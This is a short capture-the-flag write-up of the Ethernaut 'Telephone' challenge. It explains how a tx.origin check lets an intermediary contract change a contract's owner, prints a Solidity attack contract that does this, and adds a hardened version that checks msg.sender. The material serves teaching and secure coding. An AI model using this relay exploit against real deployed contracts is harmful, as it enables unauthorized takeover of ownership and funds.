Ethernaut Challenge 4 Telephone

Yong kang Chia
1 min read · Jul 20, 2022

The key ideas are:

  1. tx.origin is a global variable in Solidity which returns the address of the account that sent the transaction.
  • tx.origin (address): sender of the transaction (full call chain)
  • msg.sender (address): sender of the message (current call)
  2. The exploit happens in the line

    if (tx.origin != msg.sender) {
        owner = _owner;
    }

This means that if the attacker initiates the transaction but routes the call through an intermediate contract whose method calls changeOwner() on the Telephone contract, the owner would be changed.

  3. Normal Scenario

Alice (EOA) calls Telephone.changeOwner(Bob) directly.

  • tx.origin: Alice address
  • msg.sender: Alice address
  4. Attack Scenario

Alice (EOA) calls a smart contract, AttackTelephone.attack(Bob), that calls Telephone.changeOwner(Bob).

Since the address that initiates the transaction (tx.origin, Alice) is different from the address that calls changeOwner (msg.sender, the AttackTelephone contract), the exploit happens.

Solution Code

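pragma solidity ^0.8.0;

// Minimal declaration of the target so the attack contract can call it.
abstract contract Telephone {
    function changeOwner(address _owner) public virtual;
}

contract AttackTelephone {
    Telephone myContract;

    // Relays the call, so Telephone sees msg.sender = this contract and tx.origin = the EOA.
    function attack(address telephoneContract, address newOwner) public {
        myContract = Telephone(telephoneContract);
        myContract.changeOwner(newOwner);
    }
}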

A better approach would be to store the owner as a private variable and check if the sender is the owner.
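
The suggestion above as an added example (not code from the original post or from Ethernaut): the guard from the challenge placed next to a version that keeps the owner private and authorizes on msg.sender. The contract names, the owner variable and constructor of the vulnerable contract, the event, the zero-address check and getOwner() are assumptions made for illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example, not code from the original post.
// Vulnerable shape: the guard quoted in the post inside a minimal contract.
// The owner state variable and the constructor are assumptions.
contract TelephoneVulnerable {
    address public owner;

    constructor() {
        owner = msg.sender;
    }

    function changeOwner(address _owner) public {
        // Only asks "was this call relayed by a contract?",
        // never "is the caller the current owner?".
        if (tx.origin != msg.sender) {
            owner = _owner;
        }
    }
}

// Hardened shape following the post's suggestion:
// private owner, authorization on msg.sender.
contract TelephoneHardened {
    address private owner;

    event OwnerChanged(address indexed previousOwner, address indexed newOwner);

    constructor() {
        owner = msg.sender;
    }

    function changeOwner(address _owner) external {
        // msg.sender is the immediate caller, so a relaying contract is
        // rejected unless that contract is itself the owner.
        require(msg.sender == owner, "caller is not the owner");
        require(_owner != address(0), "new owner is the zero address");
        emit OwnerChanged(owner, _owner);
        owner = _owner;
    }

    // Read access to the private owner (hypothetical helper).
    function getOwner() external view returns (address) {
        return owner;
    }
}
```

With the hardened contract, a call relayed through AttackTelephone reverts with "caller is not the owner", because msg.sender is the relaying contract rather than the stored owner.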

Yong kang Chia

Blockchain Developer. Chainlink Ex Spartan Group, Ex Netherminds